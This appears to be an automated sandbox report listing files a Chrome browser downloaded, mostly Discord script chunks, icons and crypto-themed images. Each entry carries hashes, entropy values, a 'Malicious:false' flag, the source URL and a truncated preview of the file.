                                                                          File Type:MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                          Category:downloaded
                                                                          Size (bytes):24565
                                                                          Entropy (8bit):6.000976601202208
                                                                          Encrypted:false
                                                                          SSDEEP:384:xakxHbO0x9ipfSEuH44B445H44Q544Aq44Q4P44ZF944Q4Q4424Qb444nxWl444p:xZxH5ripqEuH44B445H44Q544Aq44Q4+
                                                                          MD5:EC2C34CADD4B5F4594415127380A85E6
                                                                          SHA1:E7E129270DA0153510EF04A148D08702B980B679
                                                                          SHA-256:128E20B3B15C65DD470CB9D0DC8FE10E2FF9F72FAC99EE621B01A391EF6B81C7
                                                                          SHA-512:C1997779FF5D0F74A7FBB359606DAB83439C143FBDB52025495BDC3A7CB87188085EAF12CC434CBF63B3F8DA5417C8A03F2E64F751C0A63508E4412EA4E7425C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/images/favicon.ico
                                                                          Preview:............ .h...F... .... .........00.... ..%..V......... ..$...:..(....... ..... ..........................................dX2.dX..dW..dW..dX..dX..dX..dX2.........................dW..dW..dX..eX..eX..eX..eX..eX..eX..dW..dW..dW..............dW..dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..........dW..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW......dX2.dW..eX..eX..|q......eX..eX..eX..eX......|q..eX..eX..eX..eX2.dW..eX..eX..........................................eX..eX..eW..dW..eX..eX..........................................eX..eX..dW..dW..eX..eX..............eX..........eX..............eX..eX..dW..dW..eX..eX..........................................eX..eX..dW..dW..eX..eX..~s..................................~s..eX..eX..dW..dW..eX..eX..eX..................................eX..eX..eX..dW..dX2.eX..eX..eX..h[..........{p..{p..........h[..eX..eX..dW..eW2.....dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..........eX..dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..e
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17165)
                                                                          Category:downloaded
                                                                          Size (bytes):17222
                                                                          Entropy (8bit):5.562035930926724
                                                                          Encrypted:false
                                                                          SSDEEP:384:9zyvLcIWw6SUIhpMSuigpO0RwHjE0961t1O4Hd3pL:9zyjchwFNhpMXpVcjb961PFd3x
                                                                          MD5:34C0CBD55C534B1FB9EC6DAA74CCEDDE
                                                                          SHA1:D4A619A58D92D0502E1B5FCB7CDED8A9DCB106C2
                                                                          SHA-256:332F73EEF8B1FE00DFA6DBDE43C6A99ACB729469D3D837753C246ED2FF25A9FE
                                                                          SHA-512:3D304A0874C2252702A20F925A09DB4EB0D0F27C74F24BEA2B178C2B63AEB502B839C90B8E6A3DFFDFBC52A551C13A02EB7994BEC75C731EB2FAD73F89B7F958
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/78995.107fd966757822e36874.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["78995"],{46773:function(e,t,l){"use strict";e.exports=l.p+"289b6053fc6a89d75452.svg"},888503:function(e,t,l){"use strict";l.r(t),l.d(t,{AVATAR_DECORATION_PADDING:function(){return L},default:function(){return M}}),l("222007");var a=l("37983"),r=l("884691"),n=l("414456"),s=l.n(n),i=l("769846"),u=l("77078"),o=l("502651"),d=l("390886"),c=l("357021"),f=l("106435"),m=l("79798"),p=l("982475"),h=l("928201"),v=l("118503"),x=l("11056"),I=l("159885"),g=l("158998"),S=l("943722"),E=l("49111"),j=l("988268"),N=l("39141"),T=l("782340"),C=l("282730");let L=(0,I.cssValueToNumber)(i.default.MEMBER_LIST_ITEM_AVATAR_DECORATION_PADDING);var M=function(e){let{selected:t=!1,colorString:l,colorRoleName:n,isOwner:i,ownerTooltipText:I,lostPermissionTooltipText:L,isTyping:M=!1,nick:A,user:_,currentUser:R,activities:P,applicationStream:y,status:b,shouldAnimateStatus:F=!1,isMobile:U,premiumSince:w,channel:k,guildId:O,className:D,onMouseDown:B,
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                          Category:downloaded
                                                                          Size (bytes):15406
                                                                          Entropy (8bit):4.94779670203288
                                                                          Encrypted:false
                                                                          SSDEEP:192:gnV2JwJO5G+rVDJQBcQHfY91HNqIB41YR7vN3E7FqvrPse9mm:fSOUSEyuURNqIB4eR7vNeqvgP
                                                                          MD5:27ADB25B2FE9B48C3E4CD79F86048C6E
                                                                          SHA1:1DD6FF71B20DE26FC81615AB7974410582FA859E
                                                                          SHA-256:7110D187AC41FF48FCD6CE017592C0ECC60631A1D1DBABCF338EB562BFBDE81F
                                                                          SHA-512:B27397BA36AE75BDDC27C14DCB9519240CC7DD2B1097610CE159DF397AB6DEFFDDC442B5EA3690665DDF20301F6A3F3FB11B82301921941A990D78162A42E3C5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/favicon.ico
                                                                          Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... .................................................LMM.FGF7LGB6QQP.........................................GGAVDE>.B@;.><9.:95.DC?.GGB.@AAP........................@@@.LKF.@?:.''#..........!... ..**&.DC@.DD>.UTU.................NJG.:95.01/.BB?.;;8.453.<<:.887./0-.020.<;9.IIF.............TQKXGD@. !.."%!.*+).$$"."" .'&$.++*.&(&."# .!%".BB?.STSN........XUP.*+&. !.. !..B@>.==9.! ..662.EEB. !.. " .%'%./0/.PQL.....gf\.PLI."#!."" .""!.db^.ZXU.440.gea.nnk..!..!$ .%'%.(*).HIE.P`P.snf<EC>.$%!.#$!.! ..^]X.................564.!#!."%#.$(&.AB>.SSN1wrk<HEA.((&.%'".!"!.LLI.................\\Z."$ ."%".'('.CC?.__X1.{z.YUQ.((&.')$.)(&.BA>.....qmj.........\\X.!#!."'$.(+(.MKG.``a.....tli.-,*.,+(.*)'.((&.AA=.DB?.qnj.{yt.hgb. # .$&$./1..QQL.........{tqXPLH.+*(.,,+..-+.'&$./.,.OMI.xvq.774."'#.%&%.BA=.RRNN............ysm.@?:.''%.SPM.WSO.TRN.VUP.IHD.LJF.#&#.@?;.YWS.....................|wq.OKG../,.-,*.))(.((&.&&%.,,*.IFC.[ZS.UUT...................
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 2500 x 1406, 8-bit colormap, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):869348
                                                                          Entropy (8bit):7.965493839376428
                                                                          Encrypted:false
                                                                          SSDEEP:24576:acP6aQySngCk3Kyh6tuMxUBkZiHoPLQyWkrh8Z:U7ZQKyc1UBwiHoTQyWEh8Z
                                                                          MD5:96B4D5F9067796255FF0879E85140F59
                                                                          SHA1:E4DF2F4B2F164B83029B1E3370F2CE39F93F7ECF
                                                                          SHA-256:9BFA50C992AA9D459AA8C5487CB79901797848C4EB544BF32FCD617A2B0826C2
                                                                          SHA-512:9BAE46E7469BA5C9478D9D21C73E6B214F938B98EF9DF6853B961B6F26C501E0C1AC319B514C78CD539FF628EF95A71B734E5F9A443FF9DBD5778FBDCA98B278
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/images/BoringSecurityMurAll.png
                                                                          Preview:.PNG........IHDR.......~.....e\_h....PLTE.`/...6 %e.ZO-../..X72X0.T`_>)Z4..U5....3.....8.A.5.J6.=.q..T8"l=.....*..S4.5++..:~6.\7......\..F.65z7w.'#.._T'2v6.$.#k8.N0G.84..,n9.X1.G........>*._7.#..>1.g7...!i4k@$.7 ...@$.q8..Y+.d7.r8..3H&..,'A{87..U./._24s: ...vI.`6)l4;w8vC.....\3.T(/..@*.}I#6#.1o3.L%.d3n.C.N+...]nx(q8E.....N1 .=!.D'...6b..}4(..#.*0g0a8.1..:~>oE,.$5|[#.D".V.:u1.H!C&+.-.U... .R8A.......N) Q%'a/.P3T..:..."s..zM1.w<&..6.xb.?&Z(I.G.pD75;C.Cow...SMFL.j:...0,2G,5.9Y.PW*.*I) 8 S.>.e,(..C<E...}QOXo;`8;vBA:.f2.OuH.a:3;P}qp.Q.y.i..-Ei@`[^.r+...hA.vGcG.6..zO[y.M.2Q..9#?.it'...#->c......7nsKWd@I...+LwmFPTH!...Vi[:B....%Moff...^&:.CFR[Jh(f.fBKf..(.b.Gw.U...P5..B.......k.........vf=}&8...yG....B?.".ib...M.I..e...6<...Eb...*i^&TP._s.h0vm....Uc.SP.<[."..Pu......Yp.w.F....,._.....I....ta.Y.....IDATx....T.......W.Q".E...#..u28d..NW.P.(...N...8H.. .$.... .t.&..@.App.....4O.K..^/.O..6....>.s.ca..|B...?.........0t..pz.i...B...q....+..=..~V.<.e.n....;n..G.......k..,.s+..F.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):27705
                                                                          Entropy (8bit):7.988389680450793
                                                                          Encrypted:false
                                                                          SSDEEP:768:o03dspa6XGEKT4bqlkn5ZGrVyTRrJMYjljw:o8apaREKTaqluPRrpjw
                                                                          MD5:40D0502625D9CA9C6BE2E2C32CC8BB67
                                                                          SHA1:9C63B4331A92B72A171740BF250436E59323E9A2
                                                                          SHA-256:F6899E71D91BF7170727067D73A6CA3FBE9CCBF8532E0A12A65063DD356B3D98
                                                                          SHA-512:C19227A0A946CB648DAF8A26241DEF665432AA5AE5F39DDC19A604E56ADD92A7C36EE0E3F58D41A840F9DC9A4E86E2CF7BC786F67DE9546592B1C516330766BF
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_Freeky_Crypto_29a0bbd006.png
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx...X.Y....1....].....DD@.)....ETPQ1Q...n]..U.tu.5Vb...|..}...u......]..s=.3<.<.g.w.s.A.......r.g<~=/.....J3..)*G.5....A.;..c..............~j....V.s!..h..c...O.A.....\s..f....V..S=.i.-..3.,.P..L..gBV9*.A..v....E2.......o..d<~3.+.3!........'.rT^......X".H.-d<~=W@v..2.......0.7.A.{.J...'...(@P.X.l..Vy.._..e.U%j.........6......W....Ju....J.*!.}..R.*.Mx.7...U....o4*...7...hT.W.n..........Q.\.....F....p....F%p..&<...J.*.Mx.7......Qw..N..O.Y.."..Dc<-b.|....~.X....+.s..J.>....@y.T12_...F....;..mE... ..!.....y...B`{1..S".Tu~.s>.....V8j...L..........Z.6<|[...]Y...%~..2..Y.^.......`3.-...R...b.ui.^...s....^,Y~.4..P..F..E.......r..V...+.,.z.h.F.M'..VH...O..EgnJ}....$.m..D.n....s.......W&,..U+....YFj*.NOCNF:.JOci.7.u..<!A..pa..h.../P.2?N.f.(...u...."..Y/%..=-.....8x...u...p...9o..<n...yh.Q.cT.h....y..t^...%.....{..q..A.?q.g..s.p..y\.x..._..k...7q......?...{..W<x..?..#...3.`9..lQ|..mnP.St.0 g
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (54115)
                                                                          Category:downloaded
                                                                          Size (bytes):54170
                                                                          Entropy (8bit):5.533427856893904
                                                                          Encrypted:false
                                                                          SSDEEP:1536:fRE/aKnFNFWEEuQi4LATZ9yvdzPqz+VSp:+aEFNFWEEuQi4LATZ9yvdzP+
                                                                          MD5:8190099121790C2441020FB9A313FAAA
                                                                          SHA1:C583DB833E7A586F8C2E60170A7CC1BAF1F8EC40
                                                                          SHA-256:F06DCD4E946EBFE0E197318DE1F0B751F3F98C57596DEF4877143AFA71A5DE59
                                                                          SHA-512:6DA60E021686D3B163243E836D8A50213E9FDEFCCB021E821BE78BA6276BE4EDF34428EAE5C96F3128CD49EA79BA641035884A1071A341053929F405ABBFC900
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/53526.ad1fa7caed5e70d3ddc2.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["53526"],{89400:function(e,t,n){var i={"./activities-rocket-time.mp3":"329160","./activity_end.mp3":"376343","./activity_launch.mp3":"865814","./activity_user_join.mp3":"44774","./activity_user_left.mp3":"964929","./call_calling.mp3":"32596","./call_ringing.mp3":"173447","./call_ringing_beat.mp3":"942044","./call_ringing_halloween.mp3":"707746","./clip_error.mp3":"933574","./clip_save.mp3":"393686","./ddr-down.mp3":"497452","./ddr-left.mp3":"524997","./ddr-right.mp3":"888937","./ddr-up.mp3":"341667","./deafen.mp3":"866563","./detune_call_calling.mp3":"563137","./detune_call_ringing.mp3":"905829","./detune_deafen.mp3":"575866","./detune_discodo.mp3":"488859","./detune_disconnect.mp3":"574665","./detune_message1.mp3":"881288","./detune_mute.mp3":"22295","./detune_ptt_start.mp3":"409382","./detune_ptt_stop.mp3":"805441","./detune_stream_ended.mp3":"274007","./detune_stream_started.mp3":"887823","./detune_stream_user_jo
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 640x213, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):10367
                                                                          Entropy (8bit):7.5649783407398425
                                                                          Encrypted:false
                                                                          SSDEEP:192:6YNMtKwfj08l4UKt9CFW8+BSCXEzyAn7OIsoJpwDTnz:6YNg7xlICFWLBSIEuA70Opwnz
                                                                          MD5:47F9F47DDBBD37C81688040FF88CBCD8
                                                                          SHA1:232C79DFAB1A3C920968D4088922678A8D6BF920
                                                                          SHA-256:B3B961444C5E2A3D1BF09746432916F066BF5E6E6248692C25F38CB003B39605
                                                                          SHA-512:54A182E01799FA50FA49624BBDF86FBFCB93C8CE489798A0CFAE306FB79E23AA9F73213AD4A520346DBD6C9421EAB66E4F4DB91C9B926FB26C4BE138402F1BBD
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/_img/vulcan.jpg
                                                                          Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (10566)
                                                                          Category:downloaded
                                                                          Size (bytes):10621
                                                                          Entropy (8bit):5.534029659571996
                                                                          Encrypted:false
                                                                          SSDEEP:192:Qtp2/Oldu4cHvBNMB5aGcSoynrC5/QWqv:v/OldmQrzomC5E
                                                                          MD5:363B3C5EB1A65F70B1EF5B61961DCF4E
                                                                          SHA1:B550E75B8B846EE524B09BEC9C45B57F1C15A8E0
                                                                          SHA-256:29413A3C68ED2FAAED883BA3A3AD0C47B977E6BC48E4B8CBC071E7CD286C5415
                                                                          SHA-512:DBD9C023EEB3D163B71AD0795B0CD890A322437F743F0F2B29973E019F81E3FE4A506B0FC205D384F2835F00509180C8DBF5EED73957217544595CA450DD3824
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/23398.99046fdebb0d52a5294c.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["23398"],{824986:function(e,t,i){"use strict";i.r(t),i.d(t,{PremiumTutorialTooltips:function(){return r},default:function(){return f}});var n,r,l=i("446674"),o=i("913144"),u=i("521012"),s=i("565785"),a=i("646718");(n=r||(r={})).FILE_UPLOAD="file_upload",n.STICKER_PICKER="sticker_picker",n.EMOJI_PICKER="emoji_picker",n.BOOSTING_FLOW="boosting_flow";let d={isPersistentCoachmarkCollapsed:!1,hasFlowStartEventBeenEmitted:{},canPlayWowMoment:!1,isPersistentHelperHidden:!0,isFetchingWowMomentMedia:!1,wowMomentWumpusMediaUrl:null,wowMomentHelperMediaUrl:null,navigatedFromHelper:!1,tutorialExpirationTime:null};function c(){d={isPersistentCoachmarkCollapsed:!1,hasFlowStartEventBeenEmitted:{},canPlayWowMoment:!1,isPersistentHelperHidden:!0,isFetchingWowMomentMedia:!1,wowMomentWumpusMediaUrl:null,wowMomentHelperMediaUrl:null,navigatedFromHelper:!1,tutorialExpirationTime:null}}function m(){let e=new Date;e.setDate(e.getDate()+14
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):16
                                                                          Entropy (8bit):3.875
                                                                          Encrypted:false
                                                                          SSDEEP:3:HNMY:L
                                                                          MD5:A95EF5B4E0E66F3C731A7F6A66E5A703
                                                                          SHA1:4235068D68F43C482143C5E462CB3A4F64CCB5C9
                                                                          SHA-256:9F93250FAB67C84B073BDCDB3AB8E1A9B9E5AB6DE52914A391B7D8B708A15721
                                                                          SHA-512:613F36A6EA33D5A94265BFC2B0809A1E09041B666009613140791C7359B886B71D797F80D90C7D0CEAD0E2C439D89CA01631B3D9F97AEFE51D03EDE23F2B8162
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnjkqJiyOoN-BIFDfwdehA=?alt=proto
                                                                          Preview:CgkKBw38HXoQGgA=
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):21312
                                                                          Entropy (8bit):7.983339853338864
                                                                          Encrypted:false
                                                                          SSDEEP:384:rZFm9Gs77alPJAzd63wTv8RaBU2tGvW5RnuN+9okG1pqV1EHOEFMtZ+/+g/V0mbX:iIssPJh3wTK2tGurP9MLqV18OsZWg/9L
                                                                          MD5:824A84986D79B0472B5A7DACEECE573D
                                                                          SHA1:6BE9327F474929EEE40486EF3D33BE8998DDBEA6
                                                                          SHA-256:38F22ADFAE8653262543676AFE6DE74D4DE63019AEE75EF61B159532EFB8DAF2
                                                                          SHA-512:BF63A4FCFD677C59A7FE5AA2915A3EFACA7D6324BC5A12FD0D282831465E290C6A78130CA547D9C6830C53D1F3C988FA4F7D6F0976EC762FF2D7BD7FBCE04A2B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_quit_b3e92694b1.png
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx...tT..I...MB.z.K3.w.@.IHH.7....w..;...7\.....I..)..lv...&_...<.....I#..r.{.23..s......w......1....m.%.m.JjZ!.m.NR.........Y.y.G...=.......C.e{..1.....LZ.DZ......m.!.6FR.j!.m.H"..oV.c.....G.N...wR.p.x .m.$..Hk.H.>.7..UZ....m&uH_.P)1.Z..+..L.}.k......G..(........X.....,.i}..[L&TR#{A"2..:HJc.....T.........Z.DC!X......c.5m..v......61@.1.9z..*......f.Y%................1pCQ..5.......d.[...(h .+~ax.{..P.2..5..[1`..c.p.!.NZ#W5....+.......~..f.L.D....O.I5.p...enZM.wlR.w.....S<b.jF>..h..op.'.o.....H..~g....5,.?q..G.......3..*Q....~U.*.....N.p..~l.. G.AW...g..k..&h..|.h?..p.........m.'H..Q.......8}~...S.!.........a...U........M......*...=..8.....}.F-.>b&.U.qh}B..z....8:VJX>*......J.^..............p..X)R.%.r$.. ?S..5....xla.'e..U.....a.C..Z\@W).K.4....69<....B[.H(.J.(..t5..C....O.p:Ox..`QWLq.V2...?sP.b..m....G..aR.3..N.99.J.. &U^R.}G...F..$.......".....tz.&V..Q8..).....=..>_..75
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:downloaded
                                                                          Size (bytes):113
                                                                          Entropy (8bit):4.460750616283363
                                                                          Encrypted:false
                                                                          SSDEEP:3:YGKjl8jwDEYRrajpHV+wJ6ARORzACDEYkayjY6v:YGKjDRrajpHV9LorMcE
                                                                          MD5:30B15D37E2F2C6C09F35BCC56B64571A
                                                                          SHA1:A5566ADA13410C39A4059BEC0FF59D51316D89CD
                                                                          SHA-256:BE58D93E5BC2C48B3FB9C87BD7140109630195E84CCE67701FCCABCF5256BFE0
                                                                          SHA-512:EE8E8192B3120D7A2FC9DCE3585D87FAAF689B2E03046C8B7F533FE3CBA408BF0E8614CA2AACD6ED21A206B4B461ECA507D5B38D01839CA9AC5B93971D1F7B10
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/api/v9/auth/location-metadata
                                                                          Preview:{"consent_required":false,"country_code":"US","promotional_email_opt_in":{"required":false,"pre_checked":false}}.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 39424, version 2.66
                                                                          Category:downloaded
                                                                          Size (bytes):39424
                                                                          Entropy (8bit):7.995696618521677
                                                                          Encrypted:true
                                                                          SSDEEP:768:RtWd6RsrMjeX+oUMPzo4niAVyynUFTyEatQHzV2h2TzpLJD5JoswdZB:/y6RsbDRzookyncNMQHzAALRovL
                                                                          MD5:7F63813838E283AEA62F1A68EF1732C2
                                                                          SHA1:C855806CB7C3CC1D29546E3E6446732197E25E93
                                                                          SHA-256:440AD8B1449985479BC37265E9912BBF2BF56FE9FFD14709358A8E9C2D5F8E5B
                                                                          SHA-512:AAEA9683EB6C4A24107FC0576EB68E9002ADB0C58D3B2C88B3F78D833EB24CECDD9FF5C20DABE7438506A44913870A1254416E2C86EC9ACBBCC545BF40EA6D48
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/f84e3e81b8d0718cd917.woff2
                                                                          Preview:wOF2..............|`.......B..........................Z.. .`..P..B..W.....,..U.6.$..`..r.. ..n..F..5[.V...n.<..j.......n....G...T...asj...nV..W........L6.0...U+.....5.M3gx..j.Ic.&..- ...<"....r..N(B..0..2`..(TI0|.N..n`..W..b....|.gX....={...S\*..C...J...._.*RY..dR...\.>.Z...yG.F.9.i...vn..!F.U....1.-u.....Z.S...k....0|..2.$D..<L..E.....H.p.....]..Lu.......t.2..Mq.B.+..r}.....&XBU/...T."..?U'T.2....|J]...!....C2e.\I..PQ-+s..*...5..G.?b.,`. )....s..A........)..z.".U.=....".M..m...c...HQs..Q...]..bE...8..d8.C233..p..l.&"C../%2R......s.$..@....1....J]U.....w..G0.....l..X......L.......z...)rD../...r.LC.T.$A. .. A.Y!.6...It....jG.t..*w./...y.X..;......~_..[...^9'.B...#..Ol.....f....F.b....g?...x.-.....i.-Kx...U.k.JG..6.q:..1.a....?....f......m.....K3...4=UK....t...o..s.Dm.9.n./.._K..JSM...T...3.H........6"3...w..>.Kb.g..............F@..E.R.+%<G..U.|6.....(S..MRt...zy.O..#P..........X.t.uj...s....#z..F...X..U.5.cT).Q...Y....pa.z.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                          Category:downloaded
                                                                          Size (bytes):9660
                                                                          Entropy (8bit):7.977709548214687
                                                                          Encrypted:false
                                                                          SSDEEP:192:r8fNIiwE98ihIqnmq8Sm/t7B4NN9uLTHvt0vhvbmoFwFSx8jCXN:8Wi/nIqnmv/JB4NOH10vg6aS3d
                                                                          MD5:2C5BE8F0D595A9248EDBA92D0419C9A7
                                                                          SHA1:422F1CA635998F8CDAEEC9E7B37E200D0D5842EA
                                                                          SHA-256:9584C8DA5E38495A93FA58ED0EFE855FD33A41AA972BCD33AD1D867828964517
                                                                          SHA-512:E60C1BAD577F43A8B5E050855031CC8959B93866A43BE35931CD50AFB7042F2A30C8B12144A5A19E548BF7FAFA7BE17BFEEEC38B294ECCC03C55CD428D4AAD68
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://explorer-api.walletconnect.com/w3m/v1/getWalletImage/fbd441cc-e861-46dc-48ae-a04228ddb500?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1
                                                                          Preview:RIFF.%..WEBPVP8X..............ALPH.......i.0....@D.M..[.../.0.......$ER......q.;.K....}......;$Y.8.4.)L....x...n..4.4q.%.....G..d....H.F)...B./.@I.JI).T...4O[..V.6........VI..W/.."...w.......(.....o]..i.i.s.dy....b."Tc.e8.F.q."z..8...B*.w....f.eY.J.I..~...(...w|.:q...(.... ....2j..U.Tl.,......M.l.sM....M.v.Z.b.z...4..|...u..4D.8..@%@.!.4..>...-..B.J....!.-.UmY.Y.X...]..(F.H.B...vN.....,.....zv./...T.u.k..<..j. .... ....I..o.p............s..9...6....`...........v...{.`.X.q*w.....s".'.Y..Y#.y....#....^....l...f4/~.........y.O..T.(j..-.J...3..!'.y..X..........<~~x.w.u?|..!`#...e...........B...<..../.N._]^.}..I....w..._..R...*Q...~.....v.y}....xI..........z5:..$z..Bg.I...{.:]...@.g0..G...m...$.7/.p./..w..E.p.x..F...n...xH...t.W..w..^....O........4.S.(.z....mE..%.R.U.yT]...v..w..B.`.......6j]iQ..J........C...T..........:..Z...%.}O_.3.]..9#k.Z.FG.Tm.........^>-.mB+...`n.F.G...S?..u.....c"...W.D...F....z[h..#_.........T...]......U.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (12454)
                                                                          Category:downloaded
                                                                          Size (bytes):12509
                                                                          Entropy (8bit):5.64408006553915
                                                                          Encrypted:false
                                                                          SSDEEP:192:9phxp2hJ/1dpD9oNq8/5xLlmcf7RIVgmf1A8hf9ABBjC/crgFCPnFu:9phxp2hrL9oNVRxLlBigarhFACEsGM
                                                                          MD5:B26EF411F729537E84084C4F10AB2A0E
                                                                          SHA1:BDB6595919BA7F8555C216295E323137EC9E6730
                                                                          SHA-256:7B6863BB9CB4CE585B51F2E5B2B1EA68176FB6A8E6207280D85605F8FFFE2A5F
                                                                          SHA-512:368CB9D0A948B0DE4303FB0364B6FF12539F474A3F8295FF74A1A0E1909C94912CCD2F10D97749FC62D9B8B211A999E180D114E9271A687B598CA054346F51FC
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/27057.ee8f9d6f6f76cab31011.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["27057"],{906069:function(t,e,l){"use strict";l.r(e),l.d(e,{ReactionIcon:function(){return i}});var n=l("37983");l("884691");var a=l("669491"),r=l("75196");let i=t=>{let{width:e=24,height:l=24,color:i=a.default.colors.INTERACTIVE_NORMAL,colorClass:s="",...u}=t;return(0,n.jsx)("svg",{...(0,r.default)(u),xmlns:"http://www.w3.org/2000/svg",width:e,height:l,fill:"none",viewBox:"0 0 24 24",children:(0,n.jsx)("path",{fill:"string"==typeof i?i:i.css,fillRule:"evenodd",d:"M12 23a11 11 0 1 0 0-22 11 11 0 0 0 0 22ZM6.5 13a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm11 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm-9.8 1.17a1 1 0 0 1 1.39.27 3.5 3.5 0 0 0 5.82 0 1 1 0 0 1 1.66 1.12 5.5 5.5 0 0 1-9.14 0 1 1 0 0 1 .27-1.4Z",clipRule:"evenodd",className:s})})}},596256:function(t,e,l){"use strict";l.r(e),l.d(e,{UploadIcon:function(){return i}});var n=l("37983");l("884691");var a=l("669491"),r=l("75196");let i=t=>{let{width:e=24,height:l=24,colo
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):118296
                                                                          Entropy (8bit):5.225443728496518
                                                                          Encrypted:false
                                                                          SSDEEP:3072:RbZ6dXwx/dhKzhLX3pYeFgzPgy1Bc8Kxikv/5YuFuPg7U0i:RbZ6dXwRdhKzhLpBFgzPgy105/9U
                                                                          MD5:0E83F48E5EDA8C13054BEC2D6CAD28A1
                                                                          SHA1:87FC0F399B57B63DD6D01BD81297E9BAFA7BBFE4
                                                                          SHA-256:151238C3373BDE8AA21715850D9D7C70BABF554584BE11D8D522C853BC37D544
                                                                          SHA-512:1BEAE35ACD343A509A1C8A55F3E4177CB286B74319F6A388AF1969A178095118E797446584869424E3F32514A66876E58EF0E35A0DB755E47005EA7134B5B49D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/shared.ffb9488d8d48f9a02fdf.js
